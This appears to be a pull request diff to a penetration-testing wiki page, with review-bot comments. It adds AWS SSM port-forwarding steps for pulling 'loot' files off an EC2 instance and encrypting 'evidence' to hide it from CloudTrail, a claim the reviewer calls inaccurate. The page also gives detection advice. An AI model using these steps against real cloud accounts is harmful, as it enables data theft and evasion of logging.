
How to transfer files in AWS using SSM #195

Open
wants to merge 1 commit into
base: master
Expand Up @@ -138,6 +138,63 @@ Note that the SSL connections will fail unless you set the `--insecure-skip-tls-

Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application.

---

#### Quick Local ↔️ Remote Port Forward (AWS-StartPortForwardingSession)

If you only need to forward **one TCP port from the EC2 instance to your local host** you can use the `AWS-StartPortForwardingSession` SSM document (no remote host parameter required):

```bash
aws ssm start-session --target i-0123456789abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters "portNumber"="8000","localPortNumber"="8000" \
--region <REGION>
```

The command establishes a bidirectional tunnel between your workstation (`localPortNumber`) and the selected port (`portNumber`) on the instance **without opening any inbound Security-Group rules**.

Common use cases:

* **File exfiltration**
1. On the instance start a quick HTTP server that points to the directory you want to exfiltrate:

```bash
python3 -m http.server 8000
```

2. From your workstation fetch the files through the SSM tunnel:

```bash
curl http://localhost:8000/loot.txt -o loot.txt
```

* **Accessing internal web applications (e.g. Nessus)**

```bash
# Forward remote Nessus port 8834 to local 8835
aws ssm start-session --target i-0123456789abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters "portNumber"="8834","localPortNumber"="8835"
# Browse to http://localhost:8835
```

Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail does not log the clear-text content:

```bash
# On the instance
7z a evidence.7z /path/to/files/* -p'Str0ngPass!'
```

---

**Defence & Detection**

* Limit who can call `ssm:StartSession` or restrict the allowed SSM documents.
* Enable Session Manager logging to CloudWatch/S3 and monitor for the `AWS-StartPortForwardingSession` document.
* Use VPC endpoints plus traffic inspection to detect unexpected data egress.



### Share AMI

```bash
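Review bot: The tip before the Defence & Detection block ("so that CloudTrail does not log the clear-text content") misdescribes what CloudTrail records: it captures the `StartSession` API call and its request parameters, not the bytes carried through the tunnel, so the justification should be corrected or dropped. The same distinction affects the second Defence & Detection bullet: the document name of a session appears in the CloudTrail `StartSession` event, and AWS documents that Session Manager logging is not available for port-forwarding sessions, so the bullet should point readers to CloudTrail for spotting `AWS-StartPortForwardingSession` rather than to CloudWatch/S3 session logs. Minor: the Nessus example omits the `--region` flag that the first command uses, and its comment says `http://localhost:8835` although Nessus serves HTTPS on 8834.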
Expand Down Expand Up @@ -474,6 +531,10 @@ if __name__ == "__main__":
main()
```

## References

- [Pentest Partners – How to transfer files in AWS using SSM](https://www.pentestpartners.com/security-blog/how-to-transfer-files-in-aws-using-ssm/)

{{#include ../../../../banners/hacktricks-training.md}}
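Review bot: The new `## References` heading is added at the very end of the file, between the script's closing fence and the banner include, with nothing in the port-forwarding section tying that text to the linked article. Since only a few context lines are visible here, please confirm the file has no earlier References section that this entry should join, and consider naming the source next to the "File exfiltration" steps so readers can tell which part of the page the link supports.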

